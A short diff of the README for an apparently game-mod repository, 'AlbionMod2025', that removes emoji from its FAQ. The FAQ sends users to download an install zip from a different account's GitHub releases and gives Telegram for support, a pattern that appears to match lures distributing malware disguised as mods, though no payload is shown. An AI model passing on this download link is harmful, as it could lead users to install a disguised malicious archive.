liveevilatlasair3/AlbionMod2025/README.md

-# Frequently Asked Questions (FAQ) вќ“
+# Frequently Asked Questions (FAQ)

 - How do I install the program?
 - You can install the archive from-> [here](https://github.com/realblonde656/gittf/releases/download/1/Install_latest.zip)

-- How can I get support? рџ’¬
+- How can I get support?
 - Out TG Support [Support](@GitSupport)

 ## Contribution